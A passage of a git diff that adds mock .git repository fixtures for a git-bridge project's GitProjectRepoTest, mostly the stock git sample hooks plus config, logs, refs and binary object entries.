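+# (Illustrative note, not part of the stock sample: only branches whose
+# names match refs/heads/??/* are guarded below. With this file installed
+# as .git/hooks/pre-rebase, a hypothetical run such as
+#     git rebase master jc/topic
+# would exit non-zero if jc/topic is already merged to 'next'.)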
+ +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? +git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. + else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". 
+ +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. + +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. 
+# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. +# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." >&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) 
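+	# (Illustrative, not in the stock sample: updates that reach this
+	# arm include refs outside the namespaces above, e.g. refs/notes/*,
+	# or mismatched pairs such as an annotated tag object pushed to a
+	# refs/heads/* name.)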
+ echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/index new file mode 100644 index 0000000..8fb7e1e Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/HEAD new file mode 100644 index 0000000..ac406aa --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/HEAD @@ -0,0 +1,3 @@ +0000000000000000000000000000000000000000 4a64431a59519ff25eff2cd94a561081146059b7 Winston Li <git@winston.li> 1475933347 +0100 commit (initial): Initial commit +4a64431a59519ff25eff2cd94a561081146059b7 71ebe5d70c8634f7531cc09c1cad5dae951a9052 Winston Li <git@winston.li> 1475933399 +0100 commit: Add ignored file +71ebe5d70c8634f7531cc09c1cad5dae951a9052 fe5adb3985be3ef5e790eaf9b1b41f862d64dfc1 Winston Li <git@winston.li> 1475938853 +0100 commit: Commit bad gitignore diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..ac406aa --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/refs/heads/master @@ -0,0 +1,3 @@ +0000000000000000000000000000000000000000 4a64431a59519ff25eff2cd94a561081146059b7 Winston Li <git@winston.li> 1475933347 +0100 commit (initial): Initial commit +4a64431a59519ff25eff2cd94a561081146059b7 71ebe5d70c8634f7531cc09c1cad5dae951a9052 Winston Li <git@winston.li> 1475933399 +0100 commit: Add ignored file +71ebe5d70c8634f7531cc09c1cad5dae951a9052 fe5adb3985be3ef5e790eaf9b1b41f862d64dfc1 Winston Li <git@winston.li> 1475938853 +0100 commit: Commit bad gitignore diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a new file mode 100644 index 0000000..72a979b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 new file mode 100644 index 0000000..fddf852 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 new file mode 100644 index 0000000..f58821d Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 new file mode 100644 index 0000000..e7279a2 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 new file mode 100644 index 0000000..5678b62 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 new file mode 100644 index 0000000..7112238 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 differ diff --git
a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f5/b2fc4665b50e85c1b66594166f218f722a4af2 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f5/b2fc4665b50e85c1b66594166f218f722a4af2 new file mode 100644 index 0000000..17bca03 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f5/b2fc4665b50e85c1b66594166f218f722a4af2 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f9/8c2cd38c5fae9c349214f6835f5b4aaa622216 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f9/8c2cd38c5fae9c349214f6835f5b4aaa622216 new file mode 100644 index 0000000..e693a1b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f9/8c2cd38c5fae9c349214f6835f5b4aaa622216 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/fe/5adb3985be3ef5e790eaf9b1b41f862d64dfc1 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/fe/5adb3985be3ef5e790eaf9b1b41f862d64dfc1 new file mode 100644 index 0000000..3196837 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/fe/5adb3985be3ef5e790eaf9b1b41f862d64dfc1 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/refs/heads/master new file mode 100644 index 0000000..5fb1c33 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/refs/heads/master @@ -0,0 +1 @@ +fe5adb3985be3ef5e790eaf9b1b41f862d64dfc1 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file1.ignored b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file1.ignored new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file1.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file1.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file2.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file2.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/.gitignore
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/.gitignore new file mode 100644 index 0000000..5545880 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/.gitignore @@ -0,0 +1,2 @@ +*.ignored + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..217e7d6 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Add ignored file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. 
git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". + +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. 
git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. +exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. 
